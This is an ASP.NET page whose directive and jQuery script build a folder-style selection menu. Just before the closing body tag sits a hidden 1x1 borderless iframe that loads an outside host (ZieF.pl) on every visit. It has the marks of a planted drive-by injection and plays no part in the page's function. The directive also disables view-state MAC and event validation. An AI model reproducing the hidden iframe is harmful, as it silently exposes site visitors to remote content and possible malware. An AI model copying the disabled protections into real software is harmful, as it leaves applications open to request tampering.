<%@ page language="C#" autoeventwireup="true" inherits="ims.web.select, ims.web" enableviewstatemac="false" enableEventValidation="false" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="select">
<head runat="server"><title></title></head>
<body>
<form id="form1" runat="server">
    <div class="headerZone" runat="server" id="header"></div>
    <div runat="server" id="main" class="clear"></div>
    <script src="js/comm.js"></script>
    <script>
        $(function () {
            if (inIframe()) $("#header").hide();
            $(".infolder").each(function () {
                $("div.item[folderid='" + $(this).attr("folder") + "']").appendTo(this);
            });
            $("div.item").hover(function () { $(this).toggleClass("hover"); }).click(function () {
                location = baseUrl + $(this).attr("rid");
            }).each(function () {
                $(this).attr("title", $(this).text());
            });
            $(".zoneTitle").addClass("pointer").click(function () {
                $(this).next("div.infolder").slideToggle(240);
                var icon = $("img", this);
                icon.attr("src", icon.is("[src$='on.gif']") ? "images/off.gif" : "images/on.gif")
            });
        });
    </script>
</form>
<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html>
